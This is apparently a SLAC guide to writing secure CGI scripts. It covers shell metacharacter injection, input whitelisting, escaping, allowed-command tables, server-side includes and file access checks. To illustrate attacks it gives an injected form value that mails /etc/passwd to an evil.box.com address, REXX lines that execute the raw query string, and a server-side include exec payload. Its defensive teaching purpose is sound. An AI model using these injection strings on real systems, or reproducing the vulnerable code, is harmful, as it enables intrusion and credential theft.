Any time that a program such as a WWW server is interacting with a networked client such as a WWW browser, there is the possibility of that client attacking the program to gain unauthorized access. Even the most innocent-looking script can be very dangerous to the integrity of your system.
With that in mind, I would like to present a few guidelines to help ensure your program does not come under attack. This presentation uses examples from REXX and Perl; however, the principles apply to most languages.
You may also want to look at Paul Phillips' CGI Security for information on Perl, C and C++. Another source of information is Lincoln Stein's well-regarded WWW Security FAQ. Also, if you are using Perl, you should consider using Perl's taint checking mechanism.
Languages like REXX, the Bourne shell and Perl provide an Interpret command or equivalent (e.g. eval in the Bourne shell) which allows you to construct a string and have the interpreter execute that string. This can be very dangerous. For example, observe the following statements in a REXX script:
INTERPRET TRANSLATE(GETENV('QUERY_STRING'),' ','+')
or
ADDRESS UNIX TRANSLATE(GETENV('QUERY_STRING'),' ','+')
These clever little snippets take the query string and convert it into a command to be executed by the Web server. Unfortunately, the user could very easily have put into the query string a command to delete all the files, or to mail a copy of the password file to someone. So you must restrict which command(s) the system is allowed to execute in response to the input.
If a set of commands needs to be executed, you may wish to set up a table containing the acceptable commands; see below for more on this.
A well-behaved client will escape any characters which have special meaning to the Bourne shell in a query string. For example it may replace special characters such as a semicolon (;) or a greater-than sign (>) with "%XX" where XX is the ASCII code for the character in hexadecimal. This helps to avoid problems with your script misinterpreting the characters when they are used to construct the arguments of a command to be executed (for example, via the REXX ADDRESS UNIX command or the Perl system() command) in the server's environment (for example the Bourne shell in Unix).
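To make the escaping concrete, here is a minimal sketch in Python (used here only for illustration; the sample query string is made up). It decodes a query string with the standard library's urllib.parse.unquote_plus and shows that the shell metacharacters are back in the data once decoding is done.

```python
from urllib.parse import quote, unquote_plus

def decode_query(raw: str) -> str:
    """Turn '+' into spaces and '%XX' escapes back into characters."""
    return unquote_plus(raw)

# A well-behaved client sends ';' as %3B and '>' as %3E.
encoded = "name=a%3Bb+%3E+c"

# After decoding, the metacharacters are ordinary characters in the string again.
decoded = decode_query(encoded)
```

Because decoding restores the original characters, any checks on the data have to be applied to the decoded value, not only to the raw query string.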
A mischievous client may use special characters to confuse your script and gain unauthorized access. For example, the following line may be present in a form-mail program:
system("/usr/lib/sendmail -t $form_address < $input_file");
The problem is that system starts a subshell, and there is no guarantee that the $form_address variable cannot be manipulated by a mischievous client. Consider the following value for $form_address:
"legit-id@good.box.com;mail wily-cracker@evil.box.com < /etc/passwd"
In this case the wily cracker has used the semicolon to append a command that mails the system's password file to herself.
The CGI script should therefore be careful to accept only the subset of characters which will not confuse your script. A reasonable subset is the digits 0-9, the letters a-z and A-Z, and the characters - _ . / @. Any other characters should be treated with care and, in general, rejected. The same goes for escaped characters after they have been converted. You may wish to review the following REXX or Perl code fragments to see how to verify that a string contains only acceptable characters.
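The same check can be sketched in Python. This is only an illustration of the idea, not one of the REXX or Perl fragments mentioned above; the function name is_safe is an assumption made for this example.

```python
import re

# The subset suggested in the text: digits, letters, and the characters - _ . / @
_SAFE = re.compile(r"[0-9A-Za-z_./@-]+")

def is_safe(value: str) -> bool:
    """Return True only if every character of value is in the accepted subset."""
    # fullmatch requires the whole string to match, so a trailing newline
    # or an empty string is rejected as well.
    return _SAFE.fullmatch(value) is not None
```

With this check, "legit-id@good.box.com" is accepted, while the hostile address shown earlier is rejected because it contains a semicolon, spaces and a less-than sign.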
The general rule is that you should not fork a subshell if the CGI script is passing untrusted data to it. In Perl you can fork subshells with the system command, with commands in backticks (for example `program $args`;), with the exec statement (for example exec("program $args");), and by opening a pipe (for example open(OUT, "|program $prog-args");). In REXX the usual way to fork a subshell is to use the ADDRESS UNIX or POPEN commands. So do not pass untrusted data to the shell, and when running external programs with arguments, check the arguments to ensure they do not contain metacharacters.
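As an illustration of running a program without a subshell, here is a hedged Python sketch. It relies on subprocess.run being given a list of arguments, in which case no shell is involved and each argument reaches the program verbatim. The helper name run_without_shell is an assumption, and a child Python process stands in for the external program so that the example is self-contained.

```python
import subprocess
import sys

def run_without_shell(argv: list) -> str:
    """Run argv directly (no shell) and return its standard output."""
    result = subprocess.run(argv, capture_output=True, text=True, check=True)
    return result.stdout

# Stand-in for an external program: a child process that prints its first argument.
hostile = "legit-id@good.box.com;mail wily-cracker@evil.box.com < /etc/passwd"
echoed = run_without_shell(
    [sys.executable, "-c", "import sys; print(sys.argv[1])", hostile]
)
```

The semicolon and the redirection arrive as plain text in a single argument, because nothing ever parses the string as a shell command. The program itself may still misinterpret its arguments, so the checks described above remain worthwhile.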
It appears to be possible to avoid UNIX Bourne shell metacharacter expansions (such as piping (|), commands in backticks (`), redirection (>, >>, <, etc.), multiple commands (;), or filename expansions (using *, ?, [], etc.)) by placing the parameters for the UNIX command into environment variables. For example, in Uni-REXX you could replace
ADDRESS UNIX 'finger' username
by
Fail=PUTENV("PARM1="username);
ADDRESS UNIX 'finger "$PARM1"'
Note that we have not exhaustively tested this on multiple platforms, and there may be some hacks that will defeat this protection.
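The environment-variable technique can be sketched in Python as follows. This assumes a POSIX /bin/sh is available; the variable name PARM1 follows the Uni-REXX example, while the helper name and the use of printf as the command are assumptions made for illustration.

```python
import os
import subprocess

def run_with_env_param(value: str) -> str:
    """Pass value to a shell command through the environment, not the command text."""
    env = dict(os.environ, PARM1=value)
    # The command string is fixed. The shell expands "$PARM1" inside double
    # quotes, and the result of that expansion is not parsed again as shell syntax.
    result = subprocess.run(
        r'printf "%s\n" "$PARM1"',
        shell=True, env=env, capture_output=True, text=True, check=True,
    )
    return result.stdout

output = run_with_env_param("someone; echo INJECTED")
```

Here the semicolon is printed as part of the value instead of starting a second command. The double quotes around $PARM1 matter: without them the shell would still split the value into words and expand filename patterns.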
Some versions of REXX (including Uni-REXX) also allow you to avoid shell expansions by using
ADDRESS COMMAND 'finger' username
instead of
ADDRESS UNIX 'finger' username.
If the above mechanisms are not available, be sure to place a backslash before every character that has special meaning to the Bourne shell before calling the program. This can be achieved easily with a short C function. See the sample REXX and Perl code fragments for how to accomplish this.
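A minimal Python sketch of the backslash approach follows. Rather than listing every metacharacter, it escapes anything outside the safe subset given earlier, which is a deliberately conservative assumption. The function name escape_for_shell is hypothetical.

```python
import re

# Anything that is not a digit, a letter, or one of - _ . / @ gets a backslash.
_UNSAFE = re.compile(r"([^0-9A-Za-z_./@-])")

def escape_for_shell(value: str) -> str:
    """Backslash-escape every character outside the safe subset."""
    # A backslash before a newline is a line continuation in the shell,
    # so newlines (and NUL bytes) are rejected instead of escaped.
    if "\n" in value or "\0" in value:
        raise ValueError("newline or NUL cannot be escaped with a backslash")
    return _UNSAFE.sub(r"\\\1", value)
```

For example, escape_for_shell("a;b") yields a\;b. In Python the standard library's shlex.quote serves a similar purpose by wrapping the value in single quotes.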
It is good practice to allow execution of only a very limited set of commands by the CGI script. This set might be selected from a table of allowed commands. See the REXX example for how this might be accomplished. This mechanism is utilized in SLAC's CGI Security Wrapper.
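A table of allowed commands might look like the following Python sketch. The command names and paths are hypothetical placeholders, and this is not the mechanism used by SLAC's CGI Security Wrapper, only an illustration of the idea.

```python
# Hypothetical table: the client may only name a key, never supply a command line.
ALLOWED_COMMANDS = {
    "date": ["/bin/date"],
    "uptime": ["/usr/bin/uptime"],
}

def lookup_command(name: str) -> list:
    """Return the fixed argument list for an allowed command name."""
    try:
        # Return a copy so callers cannot modify the table by accident.
        return list(ALLOWED_COMMANDS[name])
    except KeyError:
        raise PermissionError(f"command not allowed: {name!r}") from None
```

The client's input is used only as a lookup key, so nothing the client sends is ever executed directly.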
If your server is unfortunate enough to support server-side includes, turn them off for your script directories! Server-side includes can be abused by clients which prey on scripts that directly output things they have been sent.
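If a script must echo something the client sent, one additional precaution (an assumption on my part, not a substitute for turning server-side includes off) is to escape the markup characters first. A minimal Python sketch using the standard library's html.escape:

```python
import html

def echo_safely(user_text: str) -> str:
    """Escape <, >, & and quotes so echoed input cannot form an include directive."""
    return html.escape(user_text)

# A server-side include directive sent by a hostile client.
escaped = echo_safely('<!--#exec cmd="/bin/ls" -->')
```

After escaping, the text no longer contains the <!--# sequence that introduces a server-side include directive.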
Be careful to ensure that any file contents that you display are appropriate. For example, if the script receives a request from a form or a URL to display part or all of a particular file, the script should first verify (e.g. against a list or the httpd configuration file) that this file is appropriate to make visible via WWW.
Avoid allowing the client to access files higher up the directory chain by blocking the use of .. in the filename.
Avoid the server misinterpreting a filename for options (which might result in the process hanging awaiting standard input since no filename is found) by checking that the filename does not start with a minus sign (-).
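The three filename checks above can be combined in a short Python sketch. The list of displayable files is a hypothetical placeholder, as is the function name.

```python
# Hypothetical list of files that may be shown to clients.
ALLOWED_FILES = {"docs/readme.txt", "docs/faq.txt"}

def is_displayable(filename: str) -> bool:
    """Apply the checks from the text before displaying a file."""
    if filename.startswith("-"):
        return False          # could be mistaken for a command option
    if ".." in filename:
        return False          # could climb up the directory chain
    return filename in ALLOWED_FILES   # must be on the approved list
```

The list check alone would reject the other two cases here, but keeping the explicit tests makes the intent clear and protects scripts that later relax the list.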
The IP address of the client is available to the CGI script in the environment variable REMOTE_ADDR. This may be used by the script to refuse the request if the client's IP address does not match some requirements.
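As a sketch of such a check in Python, the following compares REMOTE_ADDR against a list of permitted networks using the standard ipaddress module. The network shown is a documentation-only range chosen for illustration, and the function name is an assumption.

```python
import ipaddress
import os

# Hypothetical requirement: only clients in this network are served.
ALLOWED_NETWORKS = [ipaddress.ip_network("192.0.2.0/24")]

def client_allowed(remote_addr: str) -> bool:
    """Return True if remote_addr parses as an IP address in an allowed network."""
    try:
        addr = ipaddress.ip_address(remote_addr)
    except ValueError:
        return False          # missing or malformed address: refuse
    return any(addr in net for net in ALLOWED_NETWORKS)

# In a CGI script the address comes from the environment.
allowed = client_allowed(os.environ.get("REMOTE_ADDR", ""))
```

A missing or unparseable address is treated as a refusal, so the script fails closed.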
It is very easy for an untested script to cause the server problems. For example, if the script mistakenly asks for input from the console (e.g. by executing a REXX PULL command with nothing on the stack, or by executing a REXX TRACE ?R command), the process on the server will stall. Or the script may go into an infinite loop, or continuously spawn new processes and use up all the server's process slots.
You may test the script in Unix without requiring it to be executed by the WWW server, by using the Unix setenv command to set the required environment variables, then calling your script and redirecting the output to a file. Then use your WWW browser to view the local file that was created.
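The same offline test can be sketched in Python. The function name, the particular environment variables and the timeout value are assumptions for illustration; a real script may need other CGI variables as well.

```python
import os
import subprocess
import sys

def run_cgi_offline(argv, query_string, output_path, timeout=10):
    """Run a CGI script outside the server and save its output to a file."""
    env = dict(
        os.environ,
        REQUEST_METHOD="GET",
        QUERY_STRING=query_string,
        REMOTE_ADDR="127.0.0.1",
    )
    with open(output_path, "w") as out:
        # stdin is /dev/null, so a script that reads from the console gets
        # end-of-file instead of stalling; the timeout stops infinite loops.
        done = subprocess.run(
            argv, env=env, stdin=subprocess.DEVNULL, stdout=out, timeout=timeout
        )
    return done.returncode
```

If the script runs longer than the timeout, subprocess.run kills it and raises subprocess.TimeoutExpired, which makes a runaway script obvious before it reaches the server.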
At SLAC we have also set up a test WWW server at http://www.slac.stanford.edu:5080/ which should be used for testing CGI scripts before they are put on the production server.
If possible set the access control to the script so it is executable by your WWW server, but not world readable. For example:
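One possible arrangement, sketched in Python, assumes the WWW server runs as a member of the script's group. The mode value and the function name restrict_script are assumptions for this sketch, not settings taken from any particular server.

```python
import os
import stat

def restrict_script(path):
    """Owner: read/write/execute. Group: read/execute. Others: no access."""
    # Equivalent to mode 0o750. An interpreted script must be readable by
    # whoever runs it, so the group keeps read permission.
    os.chmod(path, stat.S_IRWXU | stat.S_IRGRP | stat.S_IXGRP)
```

With this mode, users outside the owner and the server's group can neither read nor execute the script.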
Also remember to delete any old/backup copies that may be created automatically by an editor such as emacs, and which may still be visible and executable by the server. One way to avoid the creation of backup copies in the directory that the server will execute from is to keep and edit the actual script in another directory, and place a symbolic link to the script in the directory the server will execute the script from.
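A small Python sketch can help spot leftover copies in a script directory. The list of patterns is an assumption: emacs typically leaves names ending in ~ or wrapped in # characters, and other editors use other conventions.

```python
import fnmatch
import os

# Assumed naming patterns for editor backup and autosave files.
BACKUP_PATTERNS = ["*~", "#*#", "*.bak", "*.orig"]

def find_backup_files(directory):
    """Return the sorted names in directory that look like backup copies."""
    return sorted(
        name
        for name in os.listdir(directory)
        if any(fnmatch.fnmatch(name, pattern) for pattern in BACKUP_PATTERNS)
    )
```

Running this against the script directory before releasing a script gives a list of files to review and delete.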
This page evolved from information from Rob McCool robm@ncsa.uiuc.edu. Also I have gained many insights and useful information from John Halperin@slac.stanford.edu.
Les Cottrell